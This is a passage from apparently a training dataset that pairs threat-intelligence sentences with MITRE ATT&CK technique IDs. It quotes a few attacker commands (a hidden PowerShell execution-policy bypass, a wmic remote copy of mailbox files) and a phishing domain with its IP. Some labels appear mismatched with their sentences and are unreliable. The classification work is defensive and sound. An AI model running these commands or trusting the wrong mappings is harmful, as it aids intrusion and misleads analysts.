to the main drive's recycle bin.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has collected the username from the victim's machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya can use PsExec to help propagate itself across a network.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It loads the module with parameter vShow set to zero, which opens the application with a hidden window.  Alternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LockerGoga installation has been immediately preceded by a ""task kill"" command in order to disable anti-virus.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 used the ipconfig /all command to gather network configuration information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack used hard-coded credentials to gain access to a network share.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also take advantage of routing schemes in Content Delivery Networks to proxy command and control traffic.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti Group used a rootkit to modify typical server functionality.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy can create new users on an infected system.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has encrypted network communications with AES.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly used remote access services, including VPN and Outlook Web Access .### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot uses the command-line interface to execute arbitrary commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT encodes C2 communications with base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Retriever uses .NET web services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests resembling the example request in Figure 4### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack uses a custom binary protocol over sockets for C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All login shells on a system use /etc/profile when initiated.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has named a service it establishes on victim machines as ""TaskFrame"" to hide its malicious purpose.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has collected data from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 leveraged sticky keys to establish persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information can easily be queried using the Reg utility, though other means to access the Registry exist.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used Windows Credential Editor for credential dumping.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has used HTTP to receive stolen information from the infected machine.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar gathers information about local groups and members.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather the victim's physical location that can be used during targeting.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used the net view command.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has added Registry Run keys to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\handler.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is technically a deprecated technology , and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete used scheduled tasks for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can execute malicious content by interacting with or creating services either locally or remotely.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang performs process discovery using tasklist commands.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's network trust dependencies that can be used during targeting.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware RomeoDelta copies specified directories from the victim's machine, then archives and encrypts the directories before uploading to its C2 server.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe can download and execute additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can download additional files from C2 servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to exfiltrate data over a USB connected physical device.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHUTTERSPEED can download and execute an arbitary executable.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used mshta.exe to execute malicious payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In contrast to the two samples used in these attacks, this one did not use a PE attachment, and instead used a Microsoft Word document containing a malicious macro as the delivery vehicle### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has used Python-based malware to install and spread their coinminer.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi gathers the name of the local host, version of GNU Compiler Collection , and the system information about the CPU, machine, and operating system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can download and execute a replica of itself using certutil.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaBricks has added the entire unobfuscated code of the legitimate open source application Blink to its code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo had used AutoIt to load and execute the DLL payload.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,API hooking ### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT searches for rival malware and removes them if found.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is consistent with most espionage-motivated adversaries, as once the adversary gains access via legitimate credentials, they are able to masquerade as a legitimate user and essentially become an insider threat### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can disguise as a legitimate service to blend into normal operations.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum can collect email credentials from victims.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To assist in establishing persistence, RogueRobin creates %APPDATA%\OneDrive.bat and saves the following string to it:powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\OneDrive.ps1”.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The r1.log file stores information for exfiltration### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has modified file and directory timestamps.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SSH is a protocol that allows authorized users to open remote shells on other computers.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has used VBS to install its downloader component and malicious documents with VBA macro code.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing may also involve social engineering techniques, such as posing as a trusted source.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can use LoadLibraryW and CreateProcess to load and execute code.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are many different ways to inject code into a process, many of which abuse legitimate functionalities.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has enumerated hosts via Empire, gathering various local system information.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Downloader After the exploit or script executes, the system downloads install.exe, which has the following metadata: MD5             5a0c4e1925c76a959ab0588f683ab437 Size            46592 bytes Compile Time    2014-11-19 08:55:10Z Import Hash     6b8611f8148a6b51e37fd68e75b6a81c The file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path “C:\Users\Public”, which fails on Windows XP because that path is not present by default### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE document.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has harvested data from victim's e-mail including through execution of wmic /node: process call create ""cmd /c copy c:\Users\\\backup.pst c:\windows\temp\backup.pst"" copy ""i:\\\My Documents\.pst"" copy.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These files allow system administrators to map and start custom services at startup for different run levels.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird uses services.exe to register a new autostart service named ""Audit Service"" using a copy of the local lsass.exe file.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader adds a Visual Basic script in the Startup folder to deploy the payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has used spearphishing emails containing malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has delivered spearphishing links to their target.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec is capable of using HTTP and HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has created staging folders in directories that were infrequently used by legitimate users or processes.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has been decompressed by included shellcode prior to being launched.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has modified /etc/ld.so.preload to overwrite readdir and readdir64.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke has used several C2 servers per targeted organization.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise third-party infrastructure that can be used during targeting.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, backdoor files are encrypted using DES as a stream cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT is downloaded using HTTP over port 443.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon identifies files matching certain file extension and copies them to subdirectories it created.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork payloads download additional files from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to the compromised host following initial compromise.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used net user to enumerate local accounts on the system.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover has functionality to remove Registry Run key persistence as a cleanup procedure.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIVEHANDS can use an embedded NTRU public key to encrypt data for ransom.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot module ""Trickboot"" can write or erase the UEFI/BIOS firmware of a compromised device.### Assistant: T1495: Firmware Corruption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The stylecs.aspx webshell provides fairly significant functionality, as its developer wrote this webshell in JScript that ultimately runs any supplied JScript code provided to it within the HTTP request..### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger is capable of spreading to USB devices.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used scheduled tasks to maintain RDP backdoors.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has sent spearphishing emails with attachment to harvest credentials and deliver malware.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shellcode decodes and decompresses another DLL, which is an updated variant of UPPERCUT### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some variants of FakeM use RC4 to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,17-3 Function names To target specific victims, Astaroth is locale aware; any attempts to run the malware without locale spoofing will result in failed downloads and the inability to run the .dll files### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search in different social media sites depending on what information they seek to gather.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can copy itself into the current user’s Startup folder as “Narrator.exe” for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use Window admin shares for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some of the worst cases for distributed DoS , so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke can use control flow flattening to obscure code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used encoded data in HTTP URLs for C2.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RARSTONE uses SSL to encrypt its communication with its C2 server.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one instance, menuPass added PlugX as a service with a display name of ""Corel Writing Tools Utility.""### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can execute malicious VBScript payloads on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver deletes the original dropped file from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOMEFRY uses a command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TRITON disguised itself as the legitimate Triconex Trilog application.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy can determine the public or WAN IP address for the system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as Weaken Encryption.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,P8RAT can send randomly-generated data as part of its C2 communication.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has modified the permissions on binaries with chattr.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper contains modules that will use schtasks to carry out malicious operations.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Process Injection, this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To change the operating system in storage, the adversary will typically use the standard procedures available to device operators.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary or was otherwise compromised by them .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi collects text from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has encrypted C2 traffic using SSL/TLS.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data exfiltration is done by Okrum using the already opened channel with the C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya used PowerShell to create shellcode loaders.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,fprii.net 185.130.212.254 Domain used for spear phish sender e-mail address and to host malicious documents### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel has collected the system architecture, OS version, and MAC address information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT has registered itself as a scheduled task to run each time the current user logs in.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used shell scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to these tools, we believe OilRig attackers obtained credentials through, bruteforcing, SQL injections, and using traditional credential harvesting toolkits as we discussed in the Striking Oil blog published in September 2017### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's has a plugin that captures screenshots of the target applications.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax can download and execute additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's DNS that can be used during targeting.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used the Xserver backdoor to exfiltrate data.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Can be packed into a single .py file and run without any dependencies other than the python standard library on all OSes### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content filetypes.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can be configured to spread via removable drives.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST delivered different payloads, including TEARDROP in at least one instance.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can identify remote systems through the net view command.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 encrypts collected data using a single byte XOR key.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE creates a Registry start-up entry to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use GetProcAddress 